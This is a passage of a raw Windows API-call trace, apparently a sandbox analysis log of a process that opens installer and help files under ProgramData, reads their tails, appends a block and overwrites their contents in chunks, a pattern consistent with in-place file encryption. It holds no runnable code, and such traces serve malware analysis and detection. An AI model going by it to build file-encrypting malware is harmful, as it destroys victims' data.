lpBuffer=0x25a5b78, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x25a5b78*, lpNumberOfBytesRead=0x311f278*=0x2000, lpOverlapped=0x0) returned 1 [0154.863] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-8192, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x109b000 [0154.867] VirtualAlloc (lpAddress=0x0, dwSize=0x90000, flAllocationType=0x101000, flProtect=0x4) returned 0x7ed40000 [0156.071] VirtualFree (lpAddress=0x7ee60000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0156.075] WriteFile (in: hFile=0x1cc, lpBuffer=0x25a8ba8*, nNumberOfBytesToWrite=0x2588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a8ba8*, lpNumberOfBytesWritten=0x311f28c*=0x2588, lpOverlapped=0x0) returned 1 [0156.076] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0156.077] WriteFile (in: hFile=0x1cc, lpBuffer=0x288f948*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesWritten=0x311f28c*=0xf000, lpOverlapped=0x0) returned 1 [0156.077] WriteFile (in: hFile=0x1cc, lpBuffer=0x288f948*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesWritten=0x311f28c*=0xf000, lpOverlapped=0x0) returned 1 [0156.078] WriteFile (in: hFile=0x1cc, lpBuffer=0x288f948*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesWritten=0x311f28c*=0xf000, lpOverlapped=0x0) returned 1 [0156.078] WriteFile (in: hFile=0x1cc, lpBuffer=0x288f948*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesWritten=0x311f28c*=0xf000, lpOverlapped=0x0) returned 1 [0156.079] WriteFile (in: hFile=0x1cc, lpBuffer=0x288f948*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesWritten=0x311f28c*=0xf000, lpOverlapped=0x0) returned 1 [0156.080] WriteFile (in: hFile=0x1cc, lpBuffer=0x288f948*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesWritten=0x311f28c*=0xf000, lpOverlapped=0x0) returned 1 [0156.080] WriteFile (in: hFile=0x1cc, lpBuffer=0x288f948*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesWritten=0x311f28c*=0xf000, lpOverlapped=0x0) returned 1 [0156.081] WriteFile (in: hFile=0x1cc, lpBuffer=0x288f948*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesWritten=0x311f28c*=0xf000, lpOverlapped=0x0) returned 1 [0156.081] WriteFile (in: hFile=0x1cc, lpBuffer=0x288f948*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesWritten=0x311f28c*=0x8000, lpOverlapped=0x0) returned 1 [0156.081] VirtualFree (lpAddress=0x7ed40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0156.082] CloseHandle (hObject=0x1cc) returned 1 [0156.082] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.msaccess.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x210 [0161.404] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0161.405] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x158 [0161.405] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0161.405] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0161.405] ReleaseMutex (hMutex=0x168) returned 1 [0161.405] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.MSACCESS.14.1033.hxn", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0161.405] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.MSACCESS.14.1033.hxn", cchWideChar=23, lpMultiByteStr=0x1f88d34, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MS.MSACCESS.14.1033.hxn", lpUsedDefaultChar=0x0) returned 23 [0161.406] ReadFile (in: hFile=0x210, lpBuffer=0x26a8c68, nNumberOfBytesToRead=0x158, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26a8c68*, lpNumberOfBytesRead=0x311f2bc*=0x158, lpOverlapped=0x0) returned 1 [0161.407] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0161.407] WriteFile (in: hFile=0x210, lpBuffer=0x2839428*, nNumberOfBytesToWrite=0x6e0, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2839428*, lpNumberOfBytesWritten=0x311f2d0*=0x6e0, lpOverlapped=0x0) returned 1 [0161.408] CloseHandle (hObject=0x210) returned 1 [0161.408] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.outlook.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x210 [0161.409] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0161.409] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x152 [0161.410] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0161.410] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0161.410] ReleaseMutex (hMutex=0x168) returned 1 [0161.410] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.OUTLOOK.14.1033.hxn", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0161.410] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.OUTLOOK.14.1033.hxn", cchWideChar=22, lpMultiByteStr=0x1f88d34, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MS.OUTLOOK.14.1033.hxn", lpUsedDefaultChar=0x0) returned 22 [0161.410] ReadFile (in: hFile=0x210, lpBuffer=0x288ab48, nNumberOfBytesToRead=0x152, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x288ab48*, lpNumberOfBytesRead=0x311f2bc*=0x152, lpOverlapped=0x0) returned 1 [0161.412] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0161.412] WriteFile (in: hFile=0x210, lpBuffer=0x2839428*, nNumberOfBytesToWrite=0x6da, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2839428*, lpNumberOfBytesWritten=0x311f2d0*=0x6da, lpOverlapped=0x0) returned 1 [0161.412] CloseHandle (hObject=0x210) returned 1 [0161.413] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.visio_prm.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x210 [0161.415] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0161.415] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x15e [0161.415] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0161.415] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0161.416] ReleaseMutex (hMutex=0x168) returned 1 [0161.416] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.VISIO_PRM.14.1033.hxn", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0161.416] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.VISIO_PRM.14.1033.hxn", cchWideChar=24, lpMultiByteStr=0x1f8fcfc, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MS.VISIO_PRM.14.1033.hxn", lpUsedDefaultChar=0x0) returned 24 [0161.416] ReadFile (in: hFile=0x210, lpBuffer=0x26a8c68, nNumberOfBytesToRead=0x15e, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26a8c68*, lpNumberOfBytesRead=0x311f2bc*=0x15e, lpOverlapped=0x0) returned 1 [0161.417] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0161.419] WriteFile (in: hFile=0x210, lpBuffer=0x2663858*, nNumberOfBytesToWrite=0x6e6, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2663858*, lpNumberOfBytesWritten=0x311f2d0*=0x6e6, lpOverlapped=0x0) returned 1 [0161.419] CloseHandle (hObject=0x210) returned 1 [0161.419] CreateFileW (lpFileName="C:\\ProgramData\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\x64\\Windows6.1-KB2999226-x64.msu" (normalized: "c:\\programdata\\package cache\\54050a5f8ae7f0c56e553f0090146c17a1d2bf8d\\packages\\patch\\x64\\windows6.1-kb2999226-x64.msu"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x210 [0161.421] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0161.421] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0xfc93c [0161.421] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0161.421] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0161.421] ReleaseMutex (hMutex=0x168) returned 1 [0161.421] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Windows6.1-KB2999226-x64.msu", cchWideChar=28, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0161.422] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Windows6.1-KB2999226-x64.msu", cchWideChar=28, lpMultiByteStr=0x1f8fcfc, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Windows6.1-KB2999226-x64.msu", lpUsedDefaultChar=0x0) returned 28 [0161.422] ReadFile (in: hFile=0x210, lpBuffer=0x27ec5a8, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x27ec5a8*, lpNumberOfBytesRead=0x311f278*=0xf000, lpOverlapped=0x0) returned 1 [0161.441] ReadFile (in: hFile=0x210, lpBuffer=0x27ec5a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x27ec5a8*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0161.519] SetFilePointer (in: hFile=0x210, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0xfb93c [0161.519] ReadFile (in: hFile=0x210, lpBuffer=0x286eab8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x286eab8*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0161.643] SetFilePointer (in: hFile=0x210, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0xfb93c [0161.643] WriteFile (in: hFile=0x210, lpBuffer=0x286fab8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x286fab8*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0161.644] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0161.644] WriteFile (in: hFile=0x210, lpBuffer=0x27fc5d8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x27fc5d8*, lpNumberOfBytesWritten=0x311f28c*=0xf000, lpOverlapped=0x0) returned 1 [0161.644] WriteFile (in: hFile=0x210, lpBuffer=0x27fc5d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x27fc5d8*, lpNumberOfBytesWritten=0x311f28c*=0x1000, lpOverlapped=0x0) returned 1 [0161.644] CloseHandle (hObject=0x210) returned 1 [0161.673] CreateFileW (lpFileName="C:\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\vcredist_x64.exe" (normalized: "c:\\programdata\\package cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\vcredist_x64.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x210 [0161.674] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0161.674] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x710a8 [0161.674] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0161.675] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0161.675] ReleaseMutex (hMutex=0x168) returned 1 [0161.675] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="vcredist_x64.exe", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0161.675] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="vcredist_x64.exe", cchWideChar=16, lpMultiByteStr=0x1f88d34, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="vcredist_x64.exe", lpUsedDefaultChar=0x0) returned 16 [0161.675] ReadFile (in: hFile=0x210, lpBuffer=0x27fc5d8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x27fc5d8*, lpNumberOfBytesRead=0x311f278*=0x8000, lpOverlapped=0x0) returned 1 [0161.701] SetFilePointer (in: hFile=0x210, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x700a8 [0161.701] ReadFile (in: hFile=0x210, lpBuffer=0x286da88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x286da88*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0161.720] SetFilePointer (in: hFile=0x210, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x700a8 [0161.721] WriteFile (in: hFile=0x210, lpBuffer=0x25abb78*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x25abb78*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0161.721] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0161.721] WriteFile (in: hFile=0x210, lpBuffer=0x27fc5d8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x27fc5d8*, lpNumberOfBytesWritten=0x311f28c*=0x8000, lpOverlapped=0x0) returned 1 [0161.721] CloseHandle (hObject=0x210) returned 1 [0161.721] CreateFileW (lpFileName="C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi" (normalized: "c:\\programdata\\package cache\\{929fbd26-9020-399b-9a7a-751d61f0b942}v12.0.21005\\packages\\vcruntimeadditional_amd64\\vc_runtimeadditional_x64.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x210 [0161.723] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0161.723] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x23000 [0161.723] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0161.723] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0161.723] ReleaseMutex (hMutex=0x168) returned 1 [0161.724] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="vc_runtimeAdditional_x64.msi", cchWideChar=28, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0161.724] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="vc_runtimeAdditional_x64.msi", cchWideChar=28, lpMultiByteStr=0x1f8fedc, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="vc_runtimeAdditional_x64.msi", lpUsedDefaultChar=0x0) returned 28 [0161.724] ReadFile (in: hFile=0x210, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x311f278*=0x8000, lpOverlapped=0x0) returned 1 [0161.802] SetFilePointer (in: hFile=0x210, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x22000 [0161.802] ReadFile (in: hFile=0x210, lpBuffer=0x286da88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x286da88*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0161.834] SetFilePointer (in: hFile=0x210, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x22000 [0161.835] WriteFile (in: hFile=0x210, lpBuffer=0x286fee8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x286fee8*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0161.835] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0161.835] WriteFile (in: hFile=0x210, lpBuffer=0x28ee2d8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x28ee2d8*, lpNumberOfBytesWritten=0x311f28c*=0x8000, lpOverlapped=0x0) returned 1 [0161.835] CloseHandle (hObject=0x210) returned 1 [0161.836] CreateFileW (lpFileName="C:\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\vcredist_x64.exe" (normalized: "c:\\programdata\\package cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\vcredist_x64.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x210 [0161.838] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0161.838] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x6f398 [0161.838] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0161.838] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0161.838] ReleaseMutex (hMutex=0x168) returned 1 [0161.838] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="vcredist_x64.exe", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0161.838] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="vcredist_x64.exe", cchWideChar=16, lpMultiByteStr=0x1f88ba4, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="vcredist_x64.exe", lpUsedDefaultChar=0x0) returned 16 [0161.838] ReadFile (in: hFile=0x210, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x311f278*=0x8000, lpOverlapped=0x0) returned 1 [0162.290] SetFilePointer (in: hFile=0x210, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x6e398 [0162.290] ReadFile (in: hFile=0x210, lpBuffer=0x3d1eb58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x3d1eb58*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0162.390] SetFilePointer (in: hFile=0x210, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x6e398 [0162.390] WriteFile (in: hFile=0x210, lpBuffer=0x286da88*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x286da88*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0162.390] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0162.390] WriteFile (in: hFile=0x210, lpBuffer=0x2840938*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x2840938*, lpNumberOfBytesWritten=0x311f28c*=0x8000, lpOverlapped=0x0) returned 1 [0162.391] CloseHandle (hObject=0x210) returned 1 [0162.391] CreateFileW (lpFileName="C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\vcredist_x86.exe" (normalized: "c:\\programdata\\package cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\vcredist_x86.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x210 [0162.398] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0162.398] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x71080 [0162.399] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0162.399] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0162.399] ReleaseMutex 